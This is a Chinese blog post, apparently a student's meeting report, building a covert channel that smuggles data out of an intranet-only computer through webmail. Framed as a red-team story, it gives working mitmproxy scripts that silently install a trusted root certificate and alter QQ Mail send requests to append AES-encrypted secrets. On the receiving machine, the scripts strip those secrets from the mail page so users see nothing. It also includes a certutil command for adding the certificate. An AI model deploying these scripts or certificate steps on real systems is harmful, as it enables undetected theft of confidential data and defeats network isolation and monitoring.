借助mitmproxy通过电子邮件隐式传输信息 前言 这其实是我上上周的组会周报。
要实现的效果:
假设邮件发送方的电脑不能连接外网只能通过自建OWA等服务向内网邮箱发送邮件,但接收方除了可以通过内网访问邮件服务接收邮件外还能连接外网。在邮件收发双方各自植入一个mitmproxy脚本,发送方脚本在发送方电脑上扫描到秘密信息想要传递出来,接收方脚本获取到秘密信息后将信息解密并悄悄传输到外网。
整个过程需要保证:收发双方在浏览器中无法察觉邮件被篡改了。
应用场景(讲故事):
AB两公司都是以安全为主业的公司,B公司为了测试A公司的安全保密程度是否可靠,向A公司发起了挑战,以成功将A公司的核心电脑上的一些信息传输出来为目标。
A公司接受了这一挑战,为了防止A公司核心电脑上的内容遭到泄露,A公司将核心电脑修改为只能连接内网,A公司认为,由于B公司无法访问A公司内网,所以这样就会尽可能地安全。
但是A公司的核心电脑在某些时候仍然需要被使用,因为疫情等原因A公司有员工使用非核心电脑在家远程办公。A公司的主管有时需要使用核心电脑通过内网和非核心成员进行沟通。
B公司决定利用这一特性,想要通过A公司将邮件通过内网发送给能连接外网的非核心电脑这一特性来将核心电脑的信息传输出来。
假设B公司已经利用已有漏洞在A公司的电脑上植入了一些脚本,这些脚本可以进行如下操作:
对于A公司不能联网的核心电脑,脚本读取核心电脑上的一些信息。并在核心电脑上静默安装可信任证书,使用mitmproxy工具,在核心电脑使用邮件客户端(实际上走的HTTPS协议)发送消息时,将想要传输的消息编码加密并以一定的格式附加到邮件的末尾。
对于A公司能联网的非核心电脑,脚本同样通过mitmproxy,在非核心成员通过网页读取邮件时,读取邮件中附加的内容并解码,将邮件内容还原。之后由于非核心电脑能够连接公网,脚本可以直接往B公司预留接口发送加密后的信息,至此A公司只能连接内网的核心电脑上的一部分信息也被隐式地传输了出来。
这样,核心电脑和非核心电脑所能看到的都是正常的邮件,A公司很难察觉。因此,B公司胜利,成功证明了以安全为主业的A公司仍然存在安全保障不周的漏洞。
实现过程 改包 1 2 3 pip install mitmproxy
浏览器访问http://mitm.it下载证书并安装:
双击P12文件,启动导入向导。
选择证书存储位置(这将决定谁将信任该证书——仅当前Windows用户OR机器上的所有人)点击下一步。
再次点击下一步。
将密码留空并点击下一步。
选择“将所有证书放入以下存储”,然后点击浏览,并选择“受信任的根证书颁发机构”。
点击确定和下一步。
点击完成。
在警告对话框中点击是以确认。
这一步中,若是向“当前用户”安装证书,则不需要管理员权限。
当然也可以使用命令行添加证书(未实操)
1 certutil -addstore root 0.crt
若想编写脚本:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 from mitmproxy import httpimport logging'logger_url' )'%(asctime)s - %(name)s - %(levelname)s - %(message)s' )for handler in logger_url.handlers[:]:if isinstance (handler, logging.StreamHandler):'url.log' )'logger_text' )'%(asctime)s - %(name)s - %(levelname)s - %(message)s' )for handler in logger_text.handlers[:]:if isinstance (handler, logging.StreamHandler):'text.log' )def request (flow: http.HTTPFlow ) -> None :pass def response (flow: http.HTTPFlow ) -> None :if "web.letmefly.xyz" in flow.request.pretty_url and 'text/html' in flow.response.headers.get('content-type' , '' ):'replace HTML to LMTH' )"HTML" , "LMTH" )
设置代理服务器为localhost:8080,然后:
1 mitmproxy -s modifyPackage.py --listen-host localhost
结果发现:请求替换成功!
代理前:
代理后:
由于具有主机操作权限,所以主机信任mitm颁发的证书,浏览器也没有任何“不安全警告”,页面就这么悄无声息地被替换了。
邮件发送 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 import smtplibfrom email.mime.text import MIMETextfrom email.mime.multipart import MIMEMultipartfrom password import sender_password'smtp.qq.com' 587 '[email protected] ' '[email protected] ' '这是一封正常邮件' '今天中午吃饭吗' 'From' ] = sender_email'To' ] = receiver_email'Subject' ] = subject'plain' ))try :print ("邮件发送成功" )except Exception as e:print (f"邮件发送失败: {e} " )finally :
邮件接收 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 import imaplibimport emailfrom email.header import decode_headerfrom password import sender_password'imap.qq.com' 993 '[email protected] ' try :'inbox' ) None , 'ALL' ) if status != 'OK' :print ("没有找到邮件" )0 ].split()1 ] '(RFC822)' )if status != 'OK' :print ("无法获取邮件内容" )for response_part in msg_data:if isinstance (response_part, tuple ):1 ])'Subject' ])[0 ]if isinstance (subject, bytes ):if encoding else 'utf-8' )'From' )print (f"主题: {subject} " )print (f"发件人: {from_} " )if msg.is_multipart():for part in msg.walk():str (part.get("Content-Disposition" ))if content_type == 'text/plain' and 'attachment' not in content_disposition:True ).decode()print (f"正文: {body} " )else :True ).decode()print (f"正文: {body} " )except Exception as e:print (f"接收邮件失败: {e} " )finally :
[!CAUTION]
在邮件接收还未认证的时候,忽然想到mitmproxy是不是只能抓HTTP(s)不能抓SMTP之类的
发了个邮件果然没抓到。。。
客户端发送邮件抓包 那就不模拟了,直接使用客户端发吧,这样也更真实一点。
以QQ邮件为例,发送邮件时会向https://mail.qq.com/cgi-bin/compose_send?sid=xxxxx发送一个POST请求,表单数据包括:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 mailtype: dockey: bigattachcontent: xxxxxxxxxxx: xxxxxxxxxsid: xxxxxbigattachcnt: exstore: from_s: cnewswap: signtype: newwin: verifykey: stationeryCount: to: "Let" < [email protected] > swap3: cc: subject: 今日指令content__html: 一切正常,和昨天一样sendmailname: [email protected] savesendbox: 1 swap2: transattach: SrcMailCharset: xqqstyle: mailbgmusic: actiontype: sendpriority: sendname: LetMeFlyacctid: 0 ReAndFw: separatedcopy: false fmailid: xxxx-xxxxxxReAndFwMailid: cattachelist: upfilelist: rsturl: fileidlist: t: backgroundsendverifycode: verifycode_cn: s: commfrom: hitaddrbook: 0 selfdefinestation: - 1 backurl: noatcp: domaincheck: 0 cgitm: 1741223758403 clitm: 1741223762955 comtm: 1741223962691 logattcnt: 0 logattsize: 0 logattmethod: timezone: 28800 timezone_dst: 0 resp_charset: UTF8bgsend: 1
消息内容在content__html字段中。又觉得可行了起来。
客户端接收邮件抓包 当用户读取具体邮件时,会请求:https://mail.qq.com/cgi-bin/readmail?folderid=1&folderkey=1&t=readmail&mailid=xxxx~xxx&mode=pre&maxage=3600&base=11.08&ver=13964&sid=xxxx。
请求头之类的不重要,我们只要匹配这个url就行。
可以看到,响应体里就是一个HTML,简化后如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 <!DOCTYPE html > <html > <head > <meta http-equiv ="Content-Type" content ="text/html; charset=gb18030" /> <title > 今日指令 - QQ邮箱</title > </head > <body context ="邮件ID" module ="qmReadMail" md ="md" mu ="mu" > <div class ="mailcontainer" id ="qqmail_mailcontainer" > <div id ="mainmail" style ="position:relative;z-index:1;margin-bottom:12px;" > <div id ="contentDiv" onmouseover ="getTop().stopPropagation(event);" onClick ="getTop().preSwapLink(event, 'html', 'ZC0006_StHNHHSMYOYuV2cAGA~jBf3');" style ="position:relative;font-size:14px;height:auto;padding:15px 15px 10px 15px;z-index:1;zoom:1;line-height:1.7;" class ="body" > <div id ="qm_con_body" > <div id ="mailContentContainer" onClick ="getTop().previewContentImage(event, '')" onMousemove ="getTop().contentImgMouseOver(event, '')" onMouseout ="getTop().contentImgMouseOut(event, '')" class ="qmbox qm_con_body_content qqmail_webmail_only" style ="opacity: 0" > <div id ="mailcontent_image_operator" onMouseover ="getTop().contentOperatorMouseOver(event)" onClick ="getTop().handleOperatorClick(event)" style ="position: fixed; left: 0; top: 0;" > <div class ="operator-item" title ="图片翻译" id ="operator-item-translate" operate ="translate" > <div class ="item-inner" operate ="translate" > </div > </div > <div class ="operator-item" title ="文字提取" id ="operator-item-extract" operate ="extract" > <div class ="item-inner" operate ="extract" > </div > </div > <div class ="operator-item" title ="导出表格" id ="operator-item-form" operate ="form" > <div class ="item-inner" operate ="form" > </div > </div > <div class ="operator-item" title ="下载图片" id ="operator-item-download" operate ="download" > <div class ="item-inner" operate ="download" > </div > </div > </div > <script > document .addEventListener ('DOMContentLoaded' , function ( getTop ().handleScanContentImage ('ZC0006_StHNHHSMYOYuV2cAGA~jBf3' ); }) </script > <style > img [image-inside-content='1' ] { cursor : pointer; } </style > <style type ="text/css" > .qmbox style, .qmbox script, .qmbox head, .qmbox link, .qmbox meta { display : none !important ; } </style > </div > </div > <style > #mailContentContainer .txt { height : auto; } </style > </div > </div > </div > </body > </html >
发送的邮件主体就出现在简化后的HTML的第38行。
在研究期间还看到了一个有点意思的图,mark一下:
消息验证 - 发送邮件时后台篡改 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 from mitmproxy import httpfrom urllib.parse import parse_qs, urlencodeimport logging'logger_url' )'%(asctime)s - %(name)s - %(levelname)s - %(message)s' )for handler in logger_url.handlers[:]:if isinstance (handler, logging.StreamHandler):'url.log' )class AddSignatureAddon :def request (self, flow: http.HTTPFlow ) -> None :if flow.request.method == "POST" and "/cgi-bin/compose_send" in flow.request.url:"Content-Type" , "" )if "application/x-www-form-urlencoded" in content_type:try :"utf-8" ))except Exception as e:f"解析表单数据失败: {e} " )return if "content__html" in parsed_data and parsed_data["content__html" ]:"content__html" ][0 ]"*******计划有变*******" "content__html" ][0 ] = new_contentTrue ).encode("utf-8" )"成功添加签名!" )else :"未找到content__html字段" )
设置代理服务器为localhost:8080,然后:
1 mitmproxy -s modifyPackage.py --listen-host localhost
发送邮件,可以看到网页端没有任何异常,浏览器控制台也一切正常。
但是实际发出的邮件就不一样了,多了一段*******签名*******
消息验证 - 收到邮件时后台篡改 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 def response (self, flow: http.HTTPFlow ) -> None :if flow.request.method == 'GET' and '/cgi-bin/readmail' in flow.request.url:if "text/html" not in flow.response.headers.get("Content-Type" , "" ):return "lxml" )"div" , {"id" : "mailContentContainer" })f'{content_div} ' )if not content_div:return True , recursive=True )for node in text_nodes:match = re.search(r'\*{7}(.*?)\*{7}' , node.string)if match :match .group(1 )print (f"提取到签名:{signature} " )r'\*{7}.*?\*{7}' , '' , node.string)str (soup).encode("utf-8" )"Content-Length" ] = str (len (flow.response.content))
等下,篡改失败了?
仔细一看,response中有这么一段:
1 <meta http-equiv ="Content-Type" content ="text/html; charset=gb18030" />
logging的日志也显示乱码。
通过解码后能正常解析并修改原文内容了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 def response (self, flow: http.HTTPFlow ) -> None :if flow.request.method == 'GET' and '/cgi-bin/readmail' in flow.request.url:if "text/html" not in flow.response.headers.get("Content-Type" , "" ):return try :"gb18030" )except UnicodeDecodeError:'解码失败:可能不是GB18030编码' )"lxml" )"div" , {"id" : "mailContentContainer" })f'{content_div} ' )if not content_div:return True , recursive=True )for node in text_nodes:match = re.search(r'\*{7}(.*?)\*{7}' , node.string)if match :match .group(1 )print (f"提取到签名:{signature} " )r'\*{7}.*?\*{7}' , '' , node.string)str (soup).encode("gb18030" )"Content-Length" ] = str (len (flow.response.content))
但是通过抓包可以发现,通过beautifulsoup解析html并重新编码html,产生内容还是会稍有不同:
header:原始编码为gb18030,但decode并由BS解析后就变成了utf-8
原来:
1 2 3 4 5 6 7 <meta http-equiv ="Content-Type" content ="text/html; charset=gb18030" /> <meta content ="text/html; charset=utf-8" http-equiv ="Content-Type" />
有些细节和原来内容不完全一致
例如1.中的顺序,原来是先http-equiv后content,结果变成了先content后http-equiv
还有的 会被直接由空格代替。
解决方法有二:
令BS树的编码方式为gb18030
不BS树,直接用正则解析
使用方法一:
1 2 3 meta_tag = soup.find("meta" , attrs={"http-equiv" : "Content-Type" })if meta_tag:"content" ] = "text/html; charset=gb18030"
抓包发现meta content的内容正常了,但邮件直接全部不显示。
肉眼可见BS对原文内容进行了很多修改,于是决定使用方案二
1 2 3 4 5 6 7 8 9 10 11 try :"gb18030" )except UnicodeDecodeError:'解码失败:可能不是GB18030编码' )match = re.search(r'\*{7}(.*?)\*{7}' , html_content)if match :match .group(1 )f"提取到签名:{signature} " )r'\*{7}.*?\*{7}' , '' , html_content)"gb18030" )"Content-Length" ] = str (len (flow.response.content))
然后功能实现了
展示工作 所有所需功能已经实现,接下来就是演示了。
发送端:一个小黑框,接收想要隐蔽传递的信息
接收端:一个小黑框,显示接收到的隐藏信息
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 今日指令____ 2.____ 3.____ )
最终代码 改包:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 from mitmproxy import httpfrom urllib.parse import parse_qs, urlencodeimport loggingimport re'logger_url' )'%(asctime)s - %(name)s - %(levelname)s - %(message)s' )for handler in logger.handlers[:]:if isinstance (handler, logging.StreamHandler):'url.log' )'url log init' )class AddSignatureAddon :def request (self, flow: http.HTTPFlow ) -> None :if flow.request.method == "POST" and "/cgi-bin/compose_send" in flow.request.url:"Content-Type" , "" )if "application/x-www-form-urlencoded" not in content_type:return try :"utf-8" ))except Exception as e:f"解析表单数据失败: {e} " )return if "content__html" in parsed_data and parsed_data["content__html" ]:"content__html" ][0 ]try :with open ('letsender' , 'r' , encoding='utf-8' ) as f:except :'计划有变' f"*******{hiddenMsg} *******" "content__html" ][0 ] = new_contentTrue ).encode("utf-8" )"成功添加签名!" )else :"未找到content__html字段" )def response (self, flow: http.HTTPFlow ) -> None :if flow.request.method == 'GET' and '/cgi-bin/readmail' in flow.request.url:if "text/html" not in flow.response.headers.get("Content-Type" , "" ):return try :"gb18030" )except UnicodeDecodeError:'解码失败:可能不是GB18030编码' )match = re.search(r'\*{7}(.*?)\*{7}' , html_content)if match :match .group(1 )f"提取到签名:{signature} " )with open ('letreceiver' , 'w' , encoding='utf-8' ) as f:r'\*{7}.*?\*{7}' , '' , html_content)"gb18030" )"Content-Length" ] = str (len (flow.response.content))
发送方demo:
1 2 3 4 while True :input ('想隐蔽传输的信息:' )with open ('letsender' , 'w' , encoding='utf-8' ) as f:
接收方demo:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 import timefrom watchdog.observers import Observerfrom watchdog.events import FileSystemEventHandlerimport os'letreceiver' if not os.path.exists(FILE_PATH):f'echo > {FILE_PATH} ' )class FileChangeHandler (FileSystemEventHandler ):def on_modified (self, event ):if event.src_path.endswith(FILE_PATH):print (f"File {FILE_PATH} has been modified. Reading new content..." )self .read_file_content()def read_file_content (self ):try :with open (FILE_PATH, 'r' , encoding='utf-8' ) as file:print ("New content:" )print (content)except Exception as e:print (f"Error reading file: {e} " )if __name__ == "__main__" :'.' , recursive=False )print (f"Started watching {FILE_PATH} for changes..." )try :while True :1 )except KeyboardInterrupt:
提升 当然也可以通过AES加密
首先随机生成个AES密钥:
1 2 3 4 5 from Crypto.Random import get_random_bytes32 )print ("AES Key:" , key.hex ())
这里我们约定密钥为:e3a9a39b3c95c109257aeb8c09cb8ad331779647c54de1a40a66d308f8e4a882。
当然,在实际执行的时候,密钥可不能公布出来。
然后开始使用密钥加密解密:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 from Crypto.Cipher import AESfrom Crypto.Util.Padding import pad, unpaddef encrypt_aes (plaintext: str , key: bytes ) -> bytes :return cipher.iv + ct_bytes def decrypt_aes (ciphertext: bytes , key: bytes ) -> str :return pt.decode()'其实今天要进攻' bytes .fromhex('e3a9a39b3c95c109257aeb8c09cb8ad331779647c54de1a40a66d308f8e4a882' ) print (encrypted.hex ())print (decrypt)
运行结果:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 PS F :\OtherApps\Program\Git\Store\Store20_LeetCode\tryGoPy\MGJW\thisWeek> python main.pyF :\OtherApps\Program\Git\Store\Store20_LeetCode\tryGoPy\MGJW\thisWeek> python main.py668 c2d139c5729d432f403fa9bfad77fdb9c38cc0ae2f8dd66deff7141b656a46b36a3d2d82b8da07ee2a1e9c1179ee7F :\OtherApps\Program\Git\Store\Store20_LeetCode\tryGoPy\MGJW\thisWeek> python main.py0 a6b612c98f3d602f6185adf560d5467f3f4ca1505d6f913552a4d9de459f95cdeb25c3195410e50d3ffd40297e164e0F :\OtherApps\Program\Git\Store\Store20_LeetCode\tryGoPy\MGJW\thisWeek> python main.py75e3 cd8c45bd2223021b90deeec8352ca9bdd4f9bf816f03064099139541fa37b33a2b79e7d3a749c51ef7d4ec2a1dc1F :\OtherApps\Program\Git\Store\Store20_LeetCode\tryGoPy\MGJW\thisWeek> python main.py
不难发现,每次加密出来的结果都不一样,这就避免了“统计每个字符频率”等破解方法。
之后就是收发双方以此为依据进行数据加密与解密了。
End
同步发文于CSDN 和我的个人博客 ,原创不易,转载经作者同意后请附上原文链接 哦~
千篇源码题解已开源
